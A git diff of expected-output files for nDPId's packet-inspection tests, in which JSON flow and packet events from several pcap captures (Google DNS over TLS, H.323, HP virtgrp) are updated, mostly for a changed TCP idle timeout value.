+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":532,"packets-processed":532,"total-skipped-flows":0,"total-l4-data-len":97842,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":6,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":59,"global_ts_msec":1592553079303} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 532/532 diff --git a/test/results/h323-overflow.pcap.out b/test/results/h323-overflow.pcap.out index 4deafcdd2..ec3db199f 100644 --- a/test/results/h323-overflow.pcap.out +++ b/test/results/h323-overflow.pcap.out 
@@ -1,9 +1,9 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"h323-overflow.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":946681200000,"pkt":"IiIiIiIiIiIiIiIjCABFAAAsRr1AAIAG+9DAqAEBwKgBAnppAFA5fV1j4FJ\/s1AYQD3UwAAAAwAABA=="} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":946681200000,"pkt":"IiIiIiIiIiIiIiIjCABFAAAsRr1AAIAG+9DAqAEBwKgBAnppAFA5fV1j4FJ\/s1AYQD3UwAAAAwAABA=="} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":4,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 diff --git a/test/results/h323.pcap.out b/test/results/h323.pcap.out index 3d9929876..384d73352 100644 --- a/test/results/h323.pcap.out +++ b/test/results/h323.pcap.out 
@@ -5,12 +5,12 @@ 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1198747080010,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":125,"pkt_l4_len":91,"thread_ts_msec":1198747080010,"pkt":"ABMh8GpfABj+bZZlCABFAABviRAAAIARjk0RAgChEQIAfAa3B\/IAWwaKBIAAAAYACJFKAAQ+AE8AcABlAG4ASAAzADIAMwAgAEcAYQB0AGUAawBlAGUAcABlAHIAIABvAG4AIABtAGYAbwB0AHQAZQBrAGkAbgARAgChBrc="} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1198747080226,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1198747080226,"pkt":"ABj+bZZlABMh8GpfCABFAACgx94AAIART04RAgB8EQIAoQfyBrcAjI1fDsAAAQYACJFKAASAAQARAgB8BrgBABECAHwH8iIArgEAPQABhA4QA0AzMzMzMzMzMzCZkD4ATwBwAGUAbgBIADMAMgAzACAARwBhAHQAZQBrAGUAZQBwAGUAcgAgAG8AbgAgAG0AZgBvAHQAdABlAGsAaQBuAK4BAD0oCwAAAQABgAGA"} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="} 
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"} 
+00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1198747079978,"flow_last_seen":1198747160184,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":369,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":1297,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1198747160184} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 
diff --git a/test/results/hpvirtgrp.pcap.out b/test/results/hpvirtgrp.pcap.out
index 0fb7d0723..56b25d2a0 100644
--- a/test/results/hpvirtgrp.pcap.out
+++ b/test/results/hpvirtgrp.pcap.out
@@ -1,66 +1,66 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"hpvirtgrp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614852331255} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614852331255,"flow_last_seen":1614852331255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614852331255,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614852331255,"flow_last_seen":1614852331255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614852331255,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 